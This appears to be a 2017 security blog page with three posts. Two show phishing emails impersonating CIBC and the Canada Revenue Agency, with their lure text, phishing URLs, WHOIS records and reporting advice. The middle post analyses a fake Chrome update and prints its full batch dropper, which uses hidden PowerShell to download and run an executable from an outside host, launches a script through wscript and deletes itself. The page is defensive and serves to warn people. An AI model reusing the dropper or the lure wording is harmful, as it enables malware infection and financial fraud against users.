Saturday, May 13, 2017

Phishing Email : CIBC Canada Confirmation - Summary of transaction

For the record, here's a recent Phishing Email : CIBC Canada Confirmation phishing email that is circulating and was caught by Junk or Spam filters, but maybe not for you.

What to do?

Report them and label them as Phishing Email not SPAM (in your online email system), see below.

Report them? 

Report Phishing URLs at Google Plex now as well;

Here's the view of the email in your online mail client



         








Logo is stealing from this site
http://www.stardale.org/youth/cibc_logo.jpg
 
Thank you for choosing CIBC.
 
You have an unclaimed incoming payment of $728.89 CAD ( Transaction ID: #SDKFNDdfdfdkDKJFDDF#) 
We believe this may be a suspicious transaction and we have temporarily put a hold on your online access.

Please verify your online information to be able to claim your funds ($728.89 CAD).
Please click here to beging the verification process.

SPAM LINK TO : http://ww.netnsys.com/vqtsdqd/index.php

If your information is not verified within 24 hours the incoming transaction of $728.89 CAD will be rejected. 


Here's what netnsys.com/vqtsdqd/index.php could not be found.
and is hosted in South Korea but owned by;  

   This info is available for any site using a Whois lookup, https://www.godaddy.com/whois has one


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
Domain Name: NETNSYS.COM
Registry Domain ID: Not Available From Registry
Registrar WHOIS Server: whois.doregi.com
Registrar URL: http://www.doregi.com 
Updated Date: 2010-03-03T21:30:11Z
Creation Date: 2000-03-08T15:48:35Z
Registrar Registration Expiration Date: 2019-03-08T15:52:55Z
Registrar: HANGANG SYSTEMS,INC. D/B/A DOREGI.COM
Registrar IANA ID: 87
Registrar Abuse Contact Email: doregi@doregi.com
Registrar Abuse Contact Phone: +82.7071631100
Reseller: 
Domain Status: ok https://icann.org/epp#ok 
Registry Registrant ID: Not Available From Registry
Registrant Name: Net & Sys Co., Ltd. 
Registrant Organization: Net & Sys Co., Ltd. 
Registrant Street: 300-2, 5th Floor, Doksan-Dong GeumCheon-Gu 
Registrant City: Seoul 
Registrant State/Province: 
Registrant Postal Code: 08584 
Registrant Country: KR
Registrant Phone: +82.226462202
Registrant Phone Ext:
Registrant Fax: +82.226467151
Registrant Fax Ext:
Registrant Email: peter.s.cho@gmail.com
Registry Admin ID: Not Available From Registry
Admin Name: Sanghoon Cho 
Admin Organization: Sanghoon Cho 
Admin Street: 300-2, 5th Floor, Doksan-Dong GeumCheon-Gu 
Admin City: Seoul 
Admin State/Province: 
Admin Postal Code: 08584 
Admin Country: KR
Admin Phone: +82.226462202
Admin Phone Ext:
Admin Fax: +82.226467151
Admin Fax Ext:
Admin Email: yoon@netnsys.com
Registry Tech ID: Not Available From Registry
Tech Name: Sanghoon Cho 
Tech Organization: Sanghoon Cho 
Tech Street: 300-2, 5th Floor, Doksan-Dong GeumCheon-Gu 
Tech City: Seoul 
Tech State/Province: 
Tech Postal Code: 08584 
Tech Country: KR
Tech Phone: +82.226462202
Tech Phone Ext:
Tech Fax: +82.226467151
Tech Fax Ext:
Tech Email: yoon@netnsys.com
Name Server: ns1.doregi.com
Name Server: ns2.doregi.com
Name Server: ns3.doregi.com
Name Server:


How to tell this is a Phishing email ?


  1. Convert the email view from HTML to text, check for bad URLs.
  2. Hover over all links in email, if it's not from the same as the text then forget it.
  3. The best way is to look at message source, see below.

How to examine Email Message Source ?


Now lets look at message source
  1. Outlook.com->Actions->View Message Source. 
  2. Gmail.com->More (down arrow to top right)->Show original.
And look for phony links.


Report Phishing Email (not as Spam)


  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (down-arrow to top right)->Report Phishing 


Report phishing at Microsoft and government agencies


  1. https://www.microsoft.com/en-us/safety/online-privacy/phishing-symptoms.aspx

Posted by metadataconsulting (profile) at 11:47 AM 0 comments

Friday, May 12, 2017

How to fix the Critical Chrome Update Virus Malware Attack

The Critical Chrome Update Malware Attack has been going around and getting through many antivirus solutions. Do not click Download now button.



 What does this do? A brief analysis

 The download now button downloads the following chrome_update.bat file
  1. The script attempts to run using a Powershell command to downloads a file .dat  and renames it into a randomly named .exe file. 
  2. Which then runs this file in the background, and attempts to injection script in current running processes. 
  3. Then you are notified that the "Update Complete" with an OK dissipate button.
  4. By saying click Ok, your installing the install_flash.js  which contains VB script. 
wscript.exe is a Windows service that allows you to execute VBScript files.in this case running install_flash.js

chrome_update.bat contents
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
@echo off
echo a=new ActiveXObject('Wscript.Shell');
a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\16330788701ac441736751e3ee3c6996.exe';
(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);
Start-Process $d;
[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');
[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
>"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0"


Full analysis of this payload chrome_update.bat  at Payload Security.

 More information about install_flash.js at Payload Security.


 What to do if you did click "Download Now" button? 




      1. Run Bleeping Computer's Rkill . Do not reboot after. 

 Then run Malwarebytes Adwcleaner. Reboot (will be asked). 


2. Run Bleeping Computer's Rkill, then run Malwarebytes JRT in same session. 



 3. Run Malwarebytes
4. Run Hitman Pro
5. Run Windows Defender in Win 8+ or Windows Security Essentials for Win 7 or less.
6. Run free Kaspersky Security Scan get it here
7. Run free Kaspersky Anti-Ransom-ware Tool get it here
8. Run your Anti-Virus Solution in Deep Scan Mode 

9. Clear your Chrome Cache
Open Chrome.
  1. On your browser toolbar, click More More.
  2. Point to More tools, and then click Clear browsing data.
  3. In the "Clear browsing data" box, click the check box only for Cached images and files.
  4. Use the menu at the top to select the amount of data that you want to delete. Choose beginning of time to delete everything.
  5. Click Clear browsing data button
10. Review your cookies in Google Chrome



Posted by metadataconsulting (profile) at 12:00 PM 0 comments

Thursday, May 11, 2017

Phishing Email : CRA Applicant form return of $403.27 CAD

For the record, here's a recent Canada Revenue Agency (CRA) phishing email that is circulating and was caught by Junk or Spam filters, but maybe not for you.

What to do?

Report them and label them as Phishing Email not SPAM (in your online email system), see below.

Report them? 

Report Phishing URLs at Google Plex now as well;

Here's the view of the email in your online mail client




Dear Rob.Hamilton@outlook.com,

After the last annual calculation of your fiscal activity we have determined that you are eligible to receive a tax refund of 403.27 CAD

Please fill the secure tax return form and allow us 2-3 business days to process it
Secure form : http://cra-arg.gc.ca/tax-return/123467890/applicant

                     SPAM URL Points to href="http://parkshilton.in/felrvnj/index.php"

Tax Return Number: GB232UUSZ21
Recipient e-mail: Rob.Hamilton@outlook.com


Here's what http://parkshilton.in/felrvnj/index.php page looks 





























and is hosted in USA but owned by;    

   This info is available for any site using a Whois lookup, https://www.godaddy.com/whois has one

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
Domain ID:D5779724-AFIN
Domain Name:PARKSHILTON.IN
Created On:31-Jan-2012 10:59:24 UTC
Last Updated On:02-Apr-2017 18:20:40 UTC
Expiration Date:31-Jan-2018 10:59:24 UTC
Sponsoring Registrar:Mitsu Inc (R158-AFIN)
Status:CLIENT TRANSFER PROHIBITED
Reason:
Registrant ID:BS_10305232
Registrant Name:S P Mohanty
Registrant Organization:SME Consulting Services
Registrant Street1:Fort
Registrant City:Mumbai
Registrant State/Province:Maharashtra
Registrant Postal Code:400001
Registrant Country:IN
Registrant Phone:+22.9320565526
Registrant Email:smeconsulting@live.com
Admin ID:BS_10305232
Admin Name:S P Mohanty
Admin Organization:SME Consulting Services
Admin Street1:Fort
Admin City:Mumbai
Admin State/Province:Maharashtra
Admin Postal Code:400001
Admin Country:IN
Admin Phone:+22.9320565526
Admin Email:smeconsulting@live.com
Tech ID:BS_10305232
Tech Name:S P Mohanty
Tech Organization:SME Consulting Services
Tech Street1:Fort
Tech City:Mumbai
Tech State/Province:Maharashtra
Tech Postal Code:400001
Tech Country:IN
Tech Phone:+22.9320565526
Tech Email:smeconsulting@live.com
Name Server:NS1.RHOSTJH.COM
Name Server:NS2.RHOSTJH.COM



CRA and CDN Anti-Fraud Centre ?


According to Canada Revenue Agency (CRA), it’s important to know that:
  • The CRA never requests, by email, personal information of any kind from a taxpayer.
  • The CRA will never request information from a taxpayer pertaining to a passport, health card, or driver’s licence.
  • The CRA will not divulge taxpayer information to another person unless formal authorization is provided by the taxpayer.
  • The CRA will not leave any personal information on an answering machine.

More information about this scam is available on Canada Revenue Agency’s website. If you’ve been a victim, report it to your local police and to the Canadian Anti-Fraud Centre

How to tell this is a Phishing email ?


  1. Convert the email view from HTML to text, check for bad URLs.
  2. Hover over all links in email, if it's not from the same as the text then forget it.
  3. The best way is to look at message source, see below.

How to examine Email Message Source ?


Now lets look at message source
  1. Outlook.com->Actions->View Message Source. 
  2. Gmail.com->More (down arrow to top right)->Show original.
And look for phony links.


Report Phishing Email (not as Spam)


  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (down-arrow to top right)->Report Phishing 


Report phishing at Microsoft and government agencies


  1. https://www.microsoft.com/en-us/safety/online-privacy/phishing-symptoms.aspx


Posted by metadataconsulting (profile) at 12:02 PM 0 comments
Subscribe to: Posts (Atom)